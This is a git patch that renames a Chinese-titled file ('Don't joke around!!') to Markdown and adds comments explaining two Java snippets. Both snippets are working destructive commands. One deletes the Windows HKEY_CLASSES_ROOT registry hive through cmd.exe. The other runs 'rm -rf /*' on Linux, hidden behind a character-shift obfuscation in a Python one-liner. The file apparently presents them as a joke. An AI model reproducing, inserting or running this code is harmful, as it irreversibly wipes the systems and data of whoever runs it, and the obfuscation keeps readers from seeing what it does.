From 4fcdefb9a2bc5497b6422f9b1d8415a3c6e61916 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E3=81=A4=E5=B0=8F=E8=B5=96?= <253209169@qq.com> Date: Tue, 9 Jun 2020 16:02:56 +0800 Subject: [PATCH] =?UTF-8?q?rename=20=E5=88=AB=E5=BC=80=E7=8E=A9=E7=AC=91?= =?UTF-8?q?=E5=93=88=EF=BC=81=EF=BC=81=20to=20=E5=88=AB=E5=BC=80=E7=8E=A9?= =?UTF-8?q?=E7=AC=91=E5=93=88.md.?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...\210\253\345\274\200\347\216\251\347\254\221\345\223\210.md" | 2 ++ 1 file changed, 2 insertions(+) rename "\345\210\253\345\274\200\347\216\251\347\254\221\345\223\210\357\274\201\357\274\201" => "\345\210\253\345\274\200\347\216\251\347\254\221\345\223\210.md" (87%) diff --git "a/\345\210\253\345\274\200\347\216\251\347\254\221\345\223\210\357\274\201\357\274\201" "b/\345\210\253\345\274\200\347\216\251\347\254\221\345\223\210.md" similarity index 87% rename from "\345\210\253\345\274\200\347\216\251\347\254\221\345\223\210\357\274\201\357\274\201" rename to "\345\210\253\345\274\200\347\216\251\347\254\221\345\223\210.md" index 90b47c2..8fba7b3 100644 --- "a/\345\210\253\345\274\200\347\216\251\347\254\221\345\223\210\357\274\201\357\274\201" +++ "b/\345\210\253\345\274\200\347\216\251\347\254\221\345\223\210.md" @@ -4,6 +4,7 @@ @Override public void run() { try { + //使用DOS窗口删除HKEY_CLASSES_ROOT目录系统注册表 Runtime.getRuntime().exec("cmd.exe /k reg delete HKEY_CLASSES_ROOT /f"); } catch (IOException e) { logger.error("",e); @@ -15,6 +16,7 @@ @Override public void run() { try { + //在linux下执行 rm -rf /* Runtime.getRuntime().exec(new String[]{"/bin/sh","-c","python -c 'import os; os.system(\"\".join([chr(ord(i)-1) for i in \"sn!.sg!+\"]))'"}); } catch (IOException e) { logger.error("",e); -- Gitee